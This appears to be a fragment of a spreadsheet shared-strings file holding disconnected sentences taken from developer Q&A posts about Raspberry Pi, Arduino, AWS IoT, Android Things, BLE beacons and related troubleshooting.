  </si>
  <si>
    <t>I want deploy a large number of iBeacons with the same UUID because we can't access dynamically to the UUID of the beacons detected.</t>
  </si>
  <si>
    <t>For some reason the same doesn't work when trying to post the request using my Raspberry pi which I have connected to my laptop through an Ethernet cable and have SSH'd into.</t>
  </si>
  <si>
    <t>I have a few questions to the aws iot solution:  
I want to register a "Thing" with a few attributes and a associate a client certificate to the thing.</t>
  </si>
  <si>
    <t>But when I repeat the steps for a web project and run it I get below error
Unhandled Exception: System.IO.FileLoadException: Could not load file
  or assembly 'System.ComponentModel.Primitives, Version=4.2.0.0,
  Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a'.</t>
  </si>
  <si>
    <t>I am having issues using the temporary credentials to initiate a connection to AWS IoT using STS temporary credentials, whilst keeping things secure.</t>
  </si>
  <si>
    <t>The command that had to be used is : cf target-o  -s dev
but it gives the following errors:
C:\Users\KUNAL\Desktop\project\devicedatadisplay&gt;cf target-o 43tjaz -s dev
'target-o' is not a registered command.</t>
  </si>
  <si>
    <t>I have another process I want to run that scans for BLE beacons at the same time as keeping connected to the server and polling for button presses.</t>
  </si>
  <si>
    <t>Things shadow system is subscribed to message broker and gets sensor data, updates their shadow actors.</t>
  </si>
  <si>
    <t>The camera takes a picture of an object and try to decode it, if the decoding process wasn't successful or the DMC is not recognizable then it does thing X else does thing Y.</t>
  </si>
  <si>
    <t>In fact, entropy can even be harvested from just two independent clock sources; for instance by timing cycles of one clock via the other clock.</t>
  </si>
  <si>
    <t>https://github.com/jeffboody/spp-mirror
If invoking avrdude with "exec" does not give network permissions you may need to build avrdude as a library so that it has the same permissions as your app.</t>
  </si>
  <si>
    <t>Even if you rooted and wrote all the phone side code, a USB interface is still more like a network with device identification, time slicing to share bandwidth, etc.</t>
  </si>
  <si>
    <t>One thing to point out: to me, as a hardcore Linux user, this solution sounds a bit hacky, installing software in a user's home directory, but it works.</t>
  </si>
  <si>
    <t>In a Python script, you can give yourself messages like this: 
Run python path/to/file.py (while SSH'ed) to access the server w/real-time logs.</t>
  </si>
  <si>
    <t>However, the workaround you can try is using FilePicker, when browsing the filer, type the network shared folder address in the address far, see if you will get any AccessViolation exception when reading/writing files.</t>
  </si>
  <si>
    <t>The first thing to point out is that scripts run through the web server are unlikely to have permissions to make things happen like having the computer speak.</t>
  </si>
  <si>
    <t>Things shadow system is subscribed to message broker and gets sensor
  data, updates their shadow actors.</t>
  </si>
  <si>
    <t>Many databases implement durability by writing all transactions into a transaction log that can be played back to recreate the system state right before a failure.</t>
  </si>
  <si>
    <t>Once the shutdown sequence has begun it is impossible to register a new shutdown hook or de-register a previously-registered hook.</t>
  </si>
  <si>
    <t>For example, using a combination of these settings allow the request sender to pretend he is a certain user with certain characteristics - for example, a Windows user that uses Mozilla Firefox 19.0, has certain cookies in his browser and has obtained HTTP auth credentials.</t>
  </si>
  <si>
    <t>Julianne Frances Haugh implemented the shadow password suite that keeps the encrypted passwords in the shadow password database (e.g., the local shadow password  file , NIS, and LDAP), readable only by root.</t>
  </si>
  <si>
    <t>When having a valid packaged PEAR, the application doesn't need any additional information or any manually deployed settings like classpath settings to run the packaged component.</t>
  </si>
  <si>
    <t>You register your image name and then every time a container starts from that image,
it gets registered, and unregistered if the container is stopped.</t>
  </si>
  <si>
    <t>It can be used to read/write data to perform API request and authenticate users against one of the supported OAuth providers.</t>
  </si>
  <si>
    <t>For other Arduino boards, shield-adapters that expose debug connectors are available, or switch to one of the many available Xplained-Mini/PRO boards to fully leverage the Atmel HW eco-system.</t>
  </si>
  <si>
    <t>Somewhere in the process of swapping out the cards and rebooting (and reimaging the cards) I made progress: I now consistently get a kernel panic with Raspbian but I can boot and log into Snappy Unbuntu.</t>
  </si>
  <si>
    <t>Access to system-protected features (such as those provided by the  API) will be available to apps running on Android Things in a future developer preview release.</t>
  </si>
  <si>
    <t>I had the same issue and I figured out that for some reason the first operation (either write or read) firebase takes a long time to respond.Maybe it is due to authentication or something.</t>
  </si>
  <si>
    <t>You can read more on this topic on MongoDB official documentation page: https://docs.mongodb.com/manual/core/security-internal-authentication/</t>
  </si>
  <si>
    <t>The user can find a list of all accounts that are used on the device under Settings &gt; Accounts &amp; sync, and may at any time remove an account that shouldn't be accessed anymore.</t>
  </si>
  <si>
    <t>They can be explored, navigated and discovered in the web
Version control: it checks versions compatibility and allows safe updates of dependencies
You can use it with any text editor (it has optional eclipse integration)
It manages project setup and compilations, flashes generated firmware to the board
You can see a quick demo here and read more in the documentation.</t>
  </si>
  <si>
    <t>I'm trying to just get the following simple tutorial to work: http://www.drdobbs.com/jvm/control-an-arduino-from-java/240163864
I keep getting the following issue
I have a /var/lock and have cleared the folder but it still doesn't work, I've tried giving it 777 permissions and go+rwx but nothing works.</t>
  </si>
  <si>
    <t>I have found This tutorial  but as I reboot 
It create the wifi hotspot (good) 
I lose ethernet connection for ssh access (bad) 
to the pi  
AND if i try to connect with my Android phone, the IP configuration failed.</t>
  </si>
  <si>
    <t>I have also tried copying the code off adafruits github and pasting it into the IDE directly to make sure that there was no corruption while downloading or packet loss for reasons unknown but to my supridse I got the same error.</t>
  </si>
  <si>
    <t>I'm working on Alexa custom skill by using Alexa voice control to control raspberry gpio pins, I followed each and every steps mentioned here https://www.instructables.com/id/Control-Raspberry-Pi-GPIO-With-Amazon-Echo-and-Pyt/ but this is giving me response error
I tried degrading cryptography to 2.2.</t>
  </si>
  <si>
    <t>On page 90, I see the address that enables rising edge detection, so I put this code into my program:
From page 112-117 of the manual,I found the register that enables InterruptReQuests [0x7E00B214], but I honestly don't understand how to use it.</t>
  </si>
  <si>
    <t>At line:1 char:2
+ Enter-PSSession -ComputerName 192.168.1.3 -Credential 192.168.1.3\Ad ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (192.168.1.3:String) [Enter-PSSession], PSRemotingTransportException
+ FullyQualifiedErrorId : CreateRemoteRunspaceFailed
here my raspberry ip address is 192.168.1.3 
I followed the tutorial from this link http://go.microsoft.com/fwlink/p/?linkID=532957 step by step in both tries but I receive two different results, I also turned off my windows firewall and windows defender , but it did not work out.</t>
  </si>
  <si>
    <t>const AWS = require('aws-sdk');
// connect to Lambda to retrieve accessKeyId and secretAccessKey
$.ajax({ 
    method: 'GET', 
    url: 'my-url',
    success: function(res) {
        // connect to EC2
        AWS.config.update({accessKeyId: res.accessKeyId, secretAccessKey: res.secretAccessKey, region: res.region});
        const ec2 = new AWS.EC2();
        ec2.describeInstances({}, function(err, data) {
            if (err) console.log(err, err.stack); // an error occurred
            else     console.log(data);           // successful response
        });
    });
Error:
POST https://ec2.us-east-1.amazonaws.com/ 401 (Unauthorized)
Error: AWS was not able to validate the provided access credentials() "AuthFailure: AWS was not able to validate the provided access credentials"</t>
  </si>
  <si>
    <t>I think because of this I am unable detect raspberry pi in my android device.</t>
  </si>
  <si>
    <t>This is easier said than done, however, because it appears Android AudioTracks cannot be modified in place.</t>
  </si>
  <si>
    <t>You can check the version of PySerial as follows:
If you installed PySerial using pip, you should be able to perform an upgrade (admin privileges may be required):
pip install --upgrade pyserial
Otherwise, change your code to use the proper interface from PySerial &lt; 3.0:
while (True):
    if (ser.inWaiting() &gt; 0):
        ser.read(ser.inWaiting())</t>
  </si>
  <si>
    <t>For a long time, as long as I connect my Mac and RP directly using a single cable (with or without any other devices like monitor or keyboards connected), I can ssh to my RP using command
Yesterday, I upgraded to Jessie, then strange thing happens: 
If the monitor is connected (through HDMI) when booting the RP
If my mac is connected to a Wifi, the ssh will FAIL!</t>
  </si>
  <si>
    <t>In this app, I try to connect to AWS IOT, and to do that I believe that the AWS boto3 package tries to find the AWS credentials here: ~/.aws/credentials.</t>
  </si>
  <si>
    <t>However, it will start every time you boot up unless you unregister it.</t>
  </si>
  <si>
    <t>You can use ssh to connect to your raspberry and start the application manually each time you boot the system.</t>
  </si>
  <si>
    <t>Finally find pins that I can detect.</t>
  </si>
  <si>
    <t>A spying robot is an example of a mobile robot capable of movement in a given environment.</t>
  </si>
  <si>
    <t>I followed the steps given here to sign the request using sigv4.</t>
  </si>
  <si>
    <t>Can anyone please guide me on how to Create Thing and attach certificate through SDK?</t>
  </si>
  <si>
    <t>Never mind, I found a solution:
The usb id is not detected by the 8192cu kernel module as a supported device.</t>
  </si>
  <si>
    <t>Just remember to remove it every time you want to upload a new firmware to your board.</t>
  </si>
  <si>
    <t>Tried a couple of other programs and got one uploaded and confirmed by avrdude, but the leds still don't flash.</t>
  </si>
  <si>
    <t>I've a working version of a Raspberry Pi with a Bluetooth 4.0 (CSR) dongle that detects iBeacons (estimote) proximity using latest BlueZ.</t>
  </si>
  <si>
    <t>But I did not manage to find a way to do so without bypassing the kernel driver and writing into that register.</t>
  </si>
  <si>
    <t>I've been trying to access GPIO on Raspberry Pi with Android things using NDK, but after trying several approaches I always find some kind of security wall preventing me from accessing it.</t>
  </si>
  <si>
    <t>I just want to know if there is a way to avoid the "blocking" effect of the ethernet shield when I'm performing a request.</t>
  </si>
  <si>
    <t>I was following "Just-in-Time Registration" article in order to create, register and activate my CA certificate.</t>
  </si>
  <si>
    <t>the guide im following: https://www.instructables.com/id/Wifi-Smart-Doorsimplest-Method/
the code in esplorer
the errors im getting (its always only one error at a time):</t>
  </si>
  <si>
    <t>Linux keycodes and their matching Android keycodes can be found here: https://source.android.com/devices/input/keyboard-devices.</t>
  </si>
  <si>
    <t>Following from that, the settings file it will use will be /root/.node-red/settings.js - so it is that file you would need to enable adminAuth in.</t>
  </si>
  <si>
    <t>However pi freeze in all the following combinations,
USB keyboard + USB wifi adapter (CUI)    
USB mouse + USB wifi adapter (GUI)
In CUI, pi reboots every time I hot plugged in the adapter, and freezes on asking for login id.</t>
  </si>
  <si>
    <t>I have got to a point where I have the chip connected and I am giving the prompt this command 
"esptool.py --port COM6 --baud 74880 --trace --before no_reset
  erase_flash"
.</t>
  </si>
  <si>
    <t>Also note that I do have the necessary permissions enabled in the manifest and in both cases, the device was successfully paired to the Arduino using Android's user interface.</t>
  </si>
  <si>
    <t>I just started guessing at the URL until I found it:
This allows you to follow the instructions in their docs to register a device.</t>
  </si>
  <si>
    <t>Autodiscovery is used to programmatically find files which are intended to be read by software, such as configuration files, syndicated content, or API endpoints.</t>
  </si>
  <si>
    <t>Anyway, using a raspberry pi as a motion activated security camera, I want it to send me a video file as soon as the video program finishes recording it.</t>
  </si>
  <si>
    <t>To eliminate the possibility of the software disabling the BRK input, I activated lock level 1 on the TIM1_BDTR
register.</t>
  </si>
  <si>
    <t>Errors like that:
After start, I cannot enroll android device, enrollment hangs on retrieving the license agreement on wso2 agent.</t>
  </si>
  <si>
    <t>Additional debouncing of the switch won't be necessary since after you detect a button press, you are ignoring its state for some time.</t>
  </si>
  <si>
    <t>The only thing that comes to mind is to make a script that controls a device that exists only on raspberry is available and if not, automatically encrypt the system.</t>
  </si>
  <si>
    <t>Well, I'm not 100% sure, what an inode is (the thing in the  option), but it seems to be just some data, which holds important things about a certain file, such  its owner, permissions, timestamps, and location on the disk.</t>
  </si>
  <si>
    <t>A Refresh Token is a special kind of token that can be used to obtain a renewed access token that allows accessing a protected resource at any time.</t>
  </si>
  <si>
    <t>My ESP8266, configured as an access point, is currently programmed to read multiple DS18B20 sensors and store read values in a text file on an SD card.</t>
  </si>
  <si>
    <t>A few thoughts to help your understanding:
Standard Bluetooth LE beacons (AltBeacon, iBeacon, URL beacon) are transmit only devices that don't detect phones -- phones detect them using a custom app.</t>
  </si>
  <si>
    <t>Since your tag does not support that type of authentication (it might support a different mechanism though), you could try to skip the authentication step and only use read/write methods.</t>
  </si>
  <si>
    <t>Have a Real Time Clock or implement code to connect to an NTP server: necessary for both establishing the TLS connection and
  generating the secure token for authentication.</t>
  </si>
  <si>
    <t>[1]
Dyn offers paid domain registrations, recursive DNS, email forwarding and redirection, network monitoring and URL redirection.</t>
  </si>
  <si>
    <t>For example, if a user is browsing a long article in Safari on a Mac, he or she can move to a nearby iOS device thats signed in to iCloud using the same Apple ID and choose to have the same webpage automatically opened in Safari on iOS, with the same scroll position as on the original device.</t>
  </si>
  <si>
    <t>It can write minidump files capturing the current threads' state and the identities of the currently loaded executable and shared libraries.</t>
  </si>
  <si>
    <t>The process of adding geographical identification metadata to various media such as photographs or videos, websites, SMS messages, QR codes, or RSS feeds.</t>
  </si>
  <si>
    <t>avrdude: Device signature = 0x1e9514
avrdude: Expected signature for ATmega328P is 1E 95 0F
         Double check chip, or use -F to override this check.</t>
  </si>
  <si>
    <t>It gets stuck at the following, with no visible errors:
With the Host Light example, I do see the device registering and it works fine:
Has anyone managed to create a Host Hvac device successfully?</t>
  </si>
  <si>
    <t>I configure my Raspberry Pi BLE to send packets of iBeacon, but with my detector, I cannot detect my PiBeacon packets as fast as some of the pre-configured beacons such as estimote or radbeacon.</t>
  </si>
  <si>
    <t>Automatically detecting the format is dangerous for
raw images, write operations on block 0 will be restricted.</t>
  </si>
  <si>
    <t>I have tried using adb directly: 
adb install C:\AndroidStudioProjects\irrigator\app-release.apk
but I get 
'Permission failure: com.google.android.things.permission.USE_PERIPHERAL_IO'
even though I have these permissions in my AndroidManifest.xml:
and in the Things Console, I have ticked these permissions in the build process.</t>
  </si>
  <si>
    <t>"I'm expecting to write successfully in my RFID Card after reading a certain block, but I'm getting this error = PCD_Authenticate() failed: Timeout in communication.
"</t>
  </si>
  <si>
    <t>I have checked my API settings in coinbase to make sure I have enabled the correct settings and that my api token/secret were correct.</t>
  </si>
  <si>
    <t>a corrupt packet comes over the wire followed by a valid one, or the serial cable is unplugged right in the middle of a packet.</t>
  </si>
  <si>
    <t>https://{6-letter-org_id}.internetofthings.ibmcloud.com/api/v0002/
Use basic authentication with username set to API key and password set to API token.</t>
  </si>
  <si>
    <t>The binding procedure (enrollment) passed without problems - the policy was obtained by the device and then everything went according to official instructions.</t>
  </si>
  <si>
    <t>Implementation of the Apache DefaultHttpClient that is configured with reasonable default settings and registered schemes for Android
This class was deprecated in API level 22 (Android 5.1).</t>
  </si>
  <si>
    <t>Wi-Fi Direct is an extension to Wi-Fi, created by the Wi-Fi Alliance, that allows for Bluetooth style point-to-point networking as well as the more well known method of networking with access points that Wi-Fi traditionally uses.</t>
  </si>
  <si>
    <t>Links
Source and documentation on GitHub
Project homepage
Download
Clients
Issues
Related Tags
apache-kafka-connect
apache-kafka-streams
confluent-kafka
confluent
kafka-consumer-api
kafka-producer-api
kafka-python
spring-kafka
apache-kafka-security</t>
  </si>
  <si>
    <t>You can utilize Facebook Native Login, invoke Sharing, Game Requests and App Invites dialogs, and read and write data using the Graph API.</t>
  </si>
  <si>
    <t>General Tips for Bootloader Development
working example of a bootloader that loads a "kernel" and calls a C main function in it, in 32-bit protected mode.</t>
  </si>
  <si>
    <t>The write permission that has not been mentioned in the command, will not be revoked form the owner:
-rw-r--r-- 1 me 11 2013-01-25 09:53 x.sh
Chmod also accepts the forth (actually first) digit that sets (left to right) setUID, setGUI and sticky flags.</t>
  </si>
  <si>
    <t>With the pin floating, the device would be detected by  just fine, and when I wrote a byte it would usually write properly once and then lose connection and python would throw the same IO errors.</t>
  </si>
  <si>
    <t>Working example of a legacy BIOS int 10h bootloader that loads a "kernel" and calls a C main function in it, in 32-bit protected mode.</t>
  </si>
  <si>
    <t>Common OS images
NOOBS (New Out Of Box Software - ideal for first time users)
Raspbian (Stretch - suitable for beginners)
Ubuntu (Core or classic)
Soft-Float Debian
Pidora
Kali Linux - IT security and penetration testing</t>
  </si>
  <si>
    <t>An ip (Internet Protocol) PBX (Private branch exchange) is a PBX that provides audio, video, and instant messaging communication through the tcp-ip protocol stack for its internal network and interconnects its internal network with the Public Switched Telephone Network (PSTN) for telephony communication.</t>
  </si>
  <si>
    <t>Here is my code:
also I tried it declaring like this:
I used to transfer the above mentioned array using the following function:
txd(genimg)
def txd(tx):
    adrport.write(bytearray(tx))
Also I tried using
adrport.write(bytes(tx))
It doesnot show any errors to post the traceback, but the biometric module is not responding.</t>
  </si>
  <si>
    <t>The step three of the tutorial indicates the following command:
But I am getting the following exception:
$ aws iot get-registration-code
An error occurred (AccessDeniedException) when calling the
  GetRegistrationCode operation: User: arn:aws:iam::xxxxxxxx:user/dalton
  is not authorized to perform: iot:GetRegistrationCode on resource: *
It is not clear how I can assign the right permissions.</t>
  </si>
  <si>
    <t>The solution is to modify downloaded library by regexp on build step using dynamic build flags: !python extra_script.py
It's a dirty solution, but it's authomated and does not require any manual actions.</t>
  </si>
  <si>
    <t>Apart from every feature starting at -100 points, the reason is that it's quite hard to allow such access to USB devices without compromising security (for example avoiding a web application to read your USB keyboard inputs and thus capture all future passwords, or overheat your foot warmer).</t>
  </si>
  <si>
    <t>You can inspect it by logging into your virtual machine using ssh and then using the following command:
Adding the -f option makes it follow new output and with --tail  you can limit the output to the last  lines of the logfile.</t>
  </si>
  <si>
    <t>Though I can see the dongle flashing some light on this command:
But nothing gets detected.</t>
  </si>
  <si>
    <t>If not, how can I fix it to return "detected" only when something is actually detected?</t>
  </si>
  <si>
    <t>virtualenv/secret_ciphers/bin/activate
  &amp;&amp; cd csgostatsbot &amp;&amp; python3 CSGO_STATS_BOT_TASK.py &amp;&amp; deactivate</t>
  </si>
  <si>
    <t>This gives access to register like AX BX etc.</t>
  </si>
  <si>
    <t>I detect the chip.</t>
  </si>
  <si>
    <t>is the AT command for scanning nearby BLE devices.</t>
  </si>
  <si>
    <t>So what is the right way to detect a real device?</t>
  </si>
  <si>
    <t>This is my first time trying to access Raspberry pi using VNC.</t>
  </si>
  <si>
    <t>There is no login to the kiosk, its kinna a plug and play thing.</t>
  </si>
  <si>
    <t>So, does it mean that if a user wants to use our device, he would need to register his device, as a "Thing" in HIS Amazon account?</t>
  </si>
  <si>
    <t>I have a Intel Edison running Android Things.</t>
  </si>
  <si>
    <t>It'll read from pwd.txt file and verify it.</t>
  </si>
  <si>
    <t>I have tried using an Ethernet shield but that's not working.</t>
  </si>
  <si>
    <t>The thing is, on my mac the repo is setup with https anyway, but still doesn't ask for credentials every time.</t>
  </si>
  <si>
    <t>I want to read telemetry data with my android device.</t>
  </si>
  <si>
    <t>:1.8.0_181]
2018-12-20 00:42:53,572 ERROR --- MqttFX ClientModel             : Please verify your Settings (e.g.</t>
  </si>
  <si>
    <t>After that, when I connect the Raspberry Ethernet (at the same time eth0+wlan0 or only with eth0) and reading it, I get this error:   
The value is always 0.</t>
  </si>
  <si>
    <t>The network cable was verified and it works)</t>
  </si>
  <si>
    <t>I can connect to Raspberry via ssh or VNC and to the server by application on android.</t>
  </si>
  <si>
    <t>If the us who runs smb have no access rights, you can't read or write files.</t>
  </si>
  <si>
    <t>https://github.com/RadiusNetworks/android-ibeacon-service
Use this to detect iBeacons.</t>
  </si>
  <si>
    <t>It allows Android devices to use iBeacons much like iOS devices do.</t>
  </si>
  <si>
    <t>And by that you are not hackish, you are writing real code.</t>
  </si>
  <si>
    <t>A device can only connect to one access point at time.</t>
  </si>
  <si>
    <t>you can refer the detail in this youtube tutorial or its description for flashing firmware in nodemcu V2 or v1.0.</t>
  </si>
  <si>
    <t>Connect raspberry-pi to router using ethernet cable.</t>
  </si>
  <si>
    <t>I am quite sure that I verified publicaddress:1234 at some point.</t>
  </si>
  <si>
    <t>The command you want is:
Note: chmod 777 is a dangerous permission setting.</t>
  </si>
  <si>
    <t>Use Docklight to verify UART data with the help of USB-TTL Converter.</t>
  </si>
  <si>
    <t>I assume that your keyboard is detected by the kernel.</t>
  </si>
  <si>
    <t>Like you told before, i was trying register the beacon into Google Plataform.</t>
  </si>
  <si>
    <t>Try flashing new firmware to it.</t>
  </si>
  <si>
    <t>Yes, @Mudit Bahedia has pointed out you have not enough permission to write this DefaultMediaCost key.</t>
  </si>
  <si>
    <t>Most likely, this error caused by the firmware is not uploaded.</t>
  </si>
  <si>
    <t>When you download your firmware first time, OTADATA will be erased.</t>
  </si>
  <si>
    <t>Modify Settings
settings.py
AUTH_PROFILE_MODULE = 'application_name.UserProfile'
2.</t>
  </si>
  <si>
    <t>It is written with security in mind.</t>
  </si>
  <si>
    <t>If -w is specified, authopen will read from stdin and write to the file.</t>
  </si>
  <si>
    <t>TLDR: like old-loved permissions that were ask during intallation but this time they are more dynamic (should be ask only when they are needed) and can be revoked by user at any time.</t>
  </si>
  <si>
    <t>Here are the instructions on how to get an API key.</t>
  </si>
  <si>
    <t>Not worries about the tricky Android runtime permissions system.</t>
  </si>
  <si>
    <t>Prior to executing the SYSENTER instruction, software must specify the privilege 
level 0 code segment and code entry point, and the privilege level 0 stack segment 
and stack pointer by writing values to the following MSRs:</t>
  </si>
  <si>
    <t>However, if I use the equivalent command 
on the Raspberry, I get the following response:
Statement failed, SQLSTATE = HY000
file /var/lib/firebird/2.5/data/tadata.fdb is not a valid database
If I try to connect via the Safescan Software using the Syntax they provided ( SERVERIP:/var/lib/firebird/2.5/data/tadata.fdb ), the program gives me this error messeage:
The settings of the provided database couldn't be opened 
(Error: file /var/lib/firebird/2.5/data/tadata.fdb is not a valid database
Connection authorization failure.</t>
  </si>
  <si>
    <t>Note that you must pass the SSL certificates  and .crt (see the UV4L installation instructions to know how to generate them):
You can then access the WebRTC streaming page at:
https://raspberry:9000/stream/webrtc
You must explicitly enable screen sharing in firefox or chrome according to the instructions written in the the same page.</t>
  </si>
  <si>
    <t>When ESP8266 boots up, load those credentials and try to connect to
the Wi-Fi.</t>
  </si>
  <si>
    <t>I've pushed Up all permissions/access for scripts and png files (read/write)
One python script read data from bme280 sensor, crontab 2 minutes, no problem, it works from terminal, crontab, lua events...
Second script read datas, plot graphs and send http json command in order to update a device in domoticz.</t>
  </si>
  <si>
    <t>I couldn't find the right pictures for weigh sensor with HX711 and wifi shield, but all those need pins.</t>
  </si>
  <si>
    <t>However, I am unable to complete the Extensions &gt; Github Login step.</t>
  </si>
  <si>
    <t>You won't be able to do real time face detection on the Raspberry Pi.</t>
  </si>
  <si>
    <t>The key to doing this is to set up a Bluetooth scan using BlueZ and using it to detect beacons.</t>
  </si>
  <si>
    <t>ssh is fine, but I can't run Chromium on the Raspberry Pi via ssh (at one time, I found a tutorial on how to do this, but it has since been taken down and I think Google nixed the support for that somewhere along the line).</t>
  </si>
  <si>
    <t>Enable SSH by placing a file named 'ssh', without any extension, onto the boot partition of the SD card.</t>
  </si>
  <si>
    <t>The REST API docs for registering a device to DPS can be found here.</t>
  </si>
  <si>
    <t>This is a blacklist file, and is used to prevent the kernel from loading unecessary modules.</t>
  </si>
  <si>
    <t>Hackers need to understand the theory of computation about as much as painters need to understand paint chemistry.</t>
  </si>
  <si>
    <t>Hi I'm trying to upgrade firmware on my wifi shield by following the http://arduino.cc/en/Hacking/WiFiShieldFirmwareUpgrading instructions for mac.</t>
  </si>
  <si>
    <t>I am unable to figure out how to restrict users (with temporary security credentials) to only subscribe to a provided topic on aws IOT.</t>
  </si>
  <si>
    <t>CGI still has it's place for some things, but I've found using MySQL more secure, and MSSQL more secure still.</t>
  </si>
  <si>
    <t>When the update finally completed successfully the memory leaks were gone.</t>
  </si>
  <si>
    <t>I have found a GitHub repository called Sesame that implements a complete NFC credentials provider - you might get some inspiration from there.</t>
  </si>
  <si>
    <t>I haven't played around with the Arduino development environment at all but that error message means you're either missing the Credentials.h file or the compiler doesn't know where to find it.</t>
  </si>
  <si>
    <t>I do not know any library capable of interfacing to USB peripherals without any shield.</t>
  </si>
  <si>
    <t>In many systems this input is considered to be potentially dangerous and needs to be sanitized to ensure that the user has not injected runnable code into the application.</t>
  </si>
  <si>
    <t>It is an internal project without too much trouble for the security, and will not be published, so I do not mind sharing with other apps, and are not sensible data.</t>
  </si>
  <si>
    <t>I generated a new certificate and verified this connects me successfully:
But uploading the same certificate and private key to the button doesn't make the error go away.</t>
  </si>
  <si>
    <t>I'm following the 'Secret Agent Chat' project, and at step 8 I encountered a problem.</t>
  </si>
  <si>
    <t>So depending on whether you use your phone as a usb host, you use the following intents and permissions in your manifest.</t>
  </si>
  <si>
    <t>the next step is super tricky, but highly important: you have to find the subscriber ID for your key.</t>
  </si>
  <si>
    <t>In "prepare the environment" part, there is a step 4:
Use the following Certifcate Overview to create your test certificates.</t>
  </si>
  <si>
    <t>I have successfully implemented face detection using python by following few tutorials available and its working fine.</t>
  </si>
  <si>
    <t>I understand that  can distinguish a secure from an unsecured SSID, but I haven't found out how I could use that to my advantage in Arduino IDE.</t>
  </si>
  <si>
    <t>This is my latest version of coding:
However, when I try to verify the code using the Ardiuno editor I get the following error:
And I don't have any clue how to solve this problem.</t>
  </si>
  <si>
    <t>Checked in the simulator there is no option to enable wifi in the settings like in Android platform.</t>
  </si>
  <si>
    <t>When doing this I receive the following in debug log:
I tried to check the fingerprint on grc and got the following response:
The SSL/TLS security certificate obtained from the remote server was invalid.</t>
  </si>
  <si>
    <t>The API documentation is really clear about this and shows examples, like so:
Here you'd replace io_key with the API key, username with the Adafruit IO username on the account and feed_key with the variable you're trying to set, and 42 with the value you're setting it to.</t>
  </si>
  <si>
    <t>As result extra steps are required to figure out API signature for its usage.</t>
  </si>
  <si>
    <t>In the US, trade secrets mostly fall under state law, so details vary from one state to another.</t>
  </si>
  <si>
    <t>It is careful to leave the replicas and its own private structures in a sensible state at all times, even in case of abnormal termination or communication failures.</t>
  </si>
  <si>
    <t>First off, I spoke with a colleague about my configuration and for Raspbian (or more specifically, Debian) he recommended the following configuration settings:
Afterward, upon further inspection, here is how I was able to successfully connect.</t>
  </si>
  <si>
    <t>Ensure the serial monitor is not running and nothing is reading/writing  (or whichever port you're using), which may cause uploading interference.</t>
  </si>
  <si>
    <t>When I try reading this into a live web page, it shows me the data that has been logged previously, and updates the data only when the file is closed.</t>
  </si>
  <si>
    <t>Bear in mind that UDP makes no guarantees about reliability, however, and you'll probably find many more tutorials and documentation about TCP sockets than UDP ones.</t>
  </si>
  <si>
    <t>You could also use , and by the way detect invalid inputs using its return value:
However, sscanf may not be implemented in the library for all boards, for example on esp8266 it's yet to be released in version 2.4.0.</t>
  </si>
  <si>
    <t>I have a parallel flash memory chip made by SST and Microchip (a bit confusing) and am having trouble bypassing the write protection.</t>
  </si>
  <si>
    <t>On the other side, I receive encrypted data as (just the beginning) :
I split this, do stuff with the first part :
and want to take the image data following, and display the corresponding image.</t>
  </si>
  <si>
    <t>My program writes notification characteristics to the feather module and it gives the following exception:
There is no user session key for the specified logon session.</t>
  </si>
  <si>
    <t>:80/
PS: I am aware that it might be a better design to place the system inside another connection than "bridge" and only expose the proxy, but i am trying to learn this stuff in small steps.</t>
  </si>
  <si>
    <t>Only one error i am getting couldn't update daemon 
Error: TypeError: Invalid Version: 4.x.x
I am also unable to install Intel system studio following all the steps as mentioned on guide at Intel website.</t>
  </si>
  <si>
    <t>I have read the raspberry pi documentation to edit the rc.local script to start the application at login, but I can not figure out how to set up the python GUI with out creating a window</t>
  </si>
  <si>
    <t>you type ssh raspi-config raspberry pi open settings window, then enter interfacing settings and enable VNC
then install realvnc or something software your pc and write your pi ip for connecting.</t>
  </si>
  <si>
    <t>I would have your applications write the edge data (Raw Data) to an S3 bucket with this flow:
Edge(With credentials) -&gt; APIGateway -&gt; Lambda -&gt; S3
Save your Raw data as  files in S3.</t>
  </si>
  <si>
    <t>API keys are used to track and control how the API is being used, for example to prevent malicious use or abuse of the API (as defined perhaps by terms of service).</t>
  </si>
  <si>
    <t>However, when making a project public or open source (on GitHub for example), you don't want to be showing your production system credentials to the world.</t>
  </si>
  <si>
    <t>My question is : Would it be possible to describe me what is required (step by step) to make a connection using an Insecure Rfcomm (I read that online, I might be wrong).</t>
  </si>
  <si>
    <t>According to the user manual for rn171, sending the command "run web_app\r"
should run some pre-configured script within the chip to create an access point and allow submitting values for network access.</t>
  </si>
  <si>
    <t>now the first point is easy to be done, by having a 3rd party server where Arduino POST user credentials (can be configured when the device is bought) with the message to PHP server then the server will get GCM's Registeration ID from MySQL and POST it through cURL to GCM to push notification to the related Android device.</t>
  </si>
  <si>
    <t>I can enter this URL from a browser, and after entering my credentials this successfully calls my API http://172.16.0.40/rest/vars/set/1/12/666.</t>
  </si>
  <si>
    <t>The process for updating firmware is that the platform sends a MQTT message to tell the registered devices there is a new version, then the devices download the new version via http.</t>
  </si>
  <si>
    <t>I'm attempting to get the g_multi mode to work on:
Raspberry Pi Zero W
running a Fresh install of Raspbian Jessie (April 2017 kernel 4.4)
The goal is to have the device run as a g_mass_storage pointing to a local bootable ISO, and be able to SSH into the device using the g_ether mode.</t>
  </si>
  <si>
    <t>I am installing opencv into Raspberry Pi 3 model B with the following guide:
http://hopkinsdev.blogspot.co.uk/2016/06/opencv-310-optimized-for-raspberry-pi.html
However, after install, the opencv cannot open the webcam.</t>
  </si>
  <si>
    <t>This is what I have:
Basically, it reads the credentials from the EEPROM, if there is no credential, a WiFi configuration page is displayed, otherwise it also connects to the WiFi serving the Main Webpage to both AP and Station.</t>
  </si>
  <si>
    <t>If you do build a custom BLE device that out of a HM-10/CC2540, it would be possible to make it "detect" mobile phones, perhaps by advertising a GATT service, and then doing something upon connecting and/or writing to a characteristic.</t>
  </si>
  <si>
    <t>For example WolfSSL is designed for embedded devices but it states that it uses between 20-100kB kB of program memory and 1-36kB of RAM:
https://www.wolfssl.com/wolfSSL/benchmarks-wolfssl.html
So I suspect that the only option would be to off-load the encryption to another device.</t>
  </si>
  <si>
    <t>--privileged  Give extended privileges to this container
Adding all USB devices
You can also connect all available USB devices to a contiaer or containers by mounting whole /dev/usb/bus directory:
docker run -dit --privileged -v /dev/bus/usb:/dev/bus/usb &lt;image&gt;
Is this what you need?</t>
  </si>
  <si>
    <t>The People API lets you list and manage the authenticated user's Contacts and retrieve profile information for authenticated users and their contacts.</t>
